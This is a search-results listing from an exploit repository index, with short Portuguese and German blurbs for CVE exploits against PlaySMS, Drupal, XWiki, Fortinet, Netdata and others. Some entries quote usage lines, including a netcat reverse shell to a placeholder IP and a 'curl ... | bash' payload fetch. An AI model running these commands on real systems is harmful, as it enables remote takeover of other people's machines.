228341 matches found
MYSQL-UDF-Exploit
MYSQL-UDF-Exploit Exploit de UDF do MYSQL...
CVE-2020-8644-PlaySMS-1.4
CVE-2020-8644-PlaySMS-1.4 Script Python para explorar PlaySMS anterior à versão 1.4.3 Execução Abra uma porta na sua máquina: E então execute o exploit.py: root@kitploit: ./exploit.py Alterando o exploit Você pode querer alterar a reverse shell criada pelo exploit.py Para fazer isso, você pode...
CVE-2015-2794-finder
CVE-2015-2794-finder script automático para capturar o CVE-2015-2794 Como usar ? python exploit.py autor Criado por Wilson :...
ivanti-automationmanager-exploit
PoC para CVE-2022-44569 no Ivanti Automation Manager; a Ivanti levou mais de um ano para lançar uma correção. A Ivanti me informou que está corrigido no Ivanti Automation 2023.4... https://github.com/rweijnen/ivanti-automationmanager-exploit/assets/7575747/818f11e1-0e86-4d91-8ce1-8949e45cfd8c...
CVE-2018-7600-Drupal7
CVE-2018-7600-Drupal7 CVE-2018-7600【Drupal7】Ferramenta de varredura em massa. root@kitploit: Arquivo principal: CVE-2018-7600-Drupal7.py Na verdade, é essencialmente um exploit encapsulando whoami O princípio do Drupal7/8 é o mesmo, mas este script foi adaptado apenas para o Drupal7 Forneça...
CVE-2019-11932-SupportApp
CVE-2019-11932-SupportApp Este arquivo de código nativo tem como objetivo ser complementar ao exploit públicado do Whatsapp GIF RCE por Awakened , calculando o endereço da função system e o endereço do gadget ROP para diferentes tipos de dispositivos, que podem então ser usados para explorar a...
CVE-2018-10562
CVE-2018-10562 CVE-2018-10562 exploit Sobre RCE em roteadores domésticos GPON CVE-2018-10561: Bypass de Autenticação CVE-2018-10562: Injeção de Comando Dependências necessárias requests urllib2 ssl re Capturas de tela...
CVE-2024-21762
Uso: python3 exploit.py --target 192.168.1.1:443 --callback-ip YOURIP --callback-port 8080...
CVE-2018-7852
CVE-2018-7852 Produtos Afetados Schneider Electric Modicon M580 Versão 2.80 Schneider Electric Modicon M340 Versão 3.01 Schneider Electric Modicon Premium Versão 3.20 Schneider Electric Modicon Quantum Versão 3.60 Referências https://www.se.com/ww/en/download/document/SEVD-2019-134-11/...
RowHammer-Exploit
RowHammer-Exploit Exploit baseado em RowHammer backdoor syssuid usando rowhammer Ainda precisa de trabalho... descobrir por que as coisas não funcionam corretamente... root@kitploit: Current stage... Denial fails with the following stack trace... UG: unable to handle kernel paging request at...
PAN-OS_CVE-2024-9474
python3 exp.py...
CVE-2025-24893
CVE-2025-24893 Exploit de Execução Remota de Código para XWiki para versões anteriores a 15.10.11, 16.4.1 e 16.5.0RC1. Uso root@kitploit: $ python3 CVE-2025-24893.py -t 'http://example.com:8080' -c 'busybox nc 10.10.10.10 9001 -e /bin/bash' Use apenas para fins éticos :...
CVE-2023-28343
CVE-2023-28343 Exploit PoC para CVE-2023-28343 Uso root@kitploit: usage: exploit.py -h -t TARGET -l LOCALHOST -p LOCALPORT optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET Target url, http://localhost:9000 -l LOCALHOST, --localhost LOCALHOST Local IP addre...
CVE-2022-4262
Exploit para CVE-2022-4262 Relatório de bug oficial do Chromium. Agradecimento especial ao @clem1 por encontrar o exploit ITW. Agradecimento especial ao @5aelo pela sua RCA sobre o bug. Agradecimento especial ao @bjrjk pela sua RCA super detalhada sobre o bug. Agradecimento especial à @alisaesage...
CVE-2020-17136
CVE-2020-17136 CVE-2020-17136 exploit Referências https://bugs.chromium.org/p/project-zero/issues/detail?id=2082&q=CVE-2020-17136 https://github.com/rapid7/metasploit-framework/pull/14585...
CVE-2022-42475
CVE-2022-42475 Hintergrund Dies ist der Exploit für den Blogbeitrag hier: https://bishopfox.com/blog/exploit-cve-2022-42475 Redigierte Version Diese Version des Exploits wird ohne Ihre Bereitstellung der erforderlichen Speicheradressen für ROP-Gadgets usw. nicht funktionieren. Die Arbeit zur...
CVE-2022-0492-Container-Escape
CVE-2022-0492-Container-Escape CVE-2022-0492-Container-Escape Implementado em Go Links de referência: https://github.com/chenaotian/CVE-2022-0492 https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/...
CVE-2022-4395
MASS CVE-2022-4395 Uso root@kitploit: apt install python3 python3-pip -y pip3 install -r require.txt python3 main.py Pré-visualização Referência https://wpscan.com/vulnerability/80407ac4-8ce3-4df7-9c41-007b69045c40...
CVE-2023-38646
CVE-2023-38646 Ein Python RCE-Exploit für CVE-2023-38646 Verwendung Einen Listener starten root@kitploit: nc -lvnp Den Exploit ausführen root@kitploit: python3 CVE-2023-38646.py -u -l -p Hilfe root@kitploit: python3 CVE-2023-38646.py -h usage: CVE-2023-38646.py -h -u URL -l LHOST -p LPORT optiona...
CVE-2024-32019-poc
CVE-2024-32019-poc Netdata ndsudo PoC Compile o binário: root@kitploit: go build -ldflags "-s -w" -o nvme poc.go upx nvme Execute o script bash: root@kitploit: bash exploit.sh Na máquina alvo, execute em um diretório gravável: root@kitploit: curl http://:8000/payload.sh | bash Ele baixará...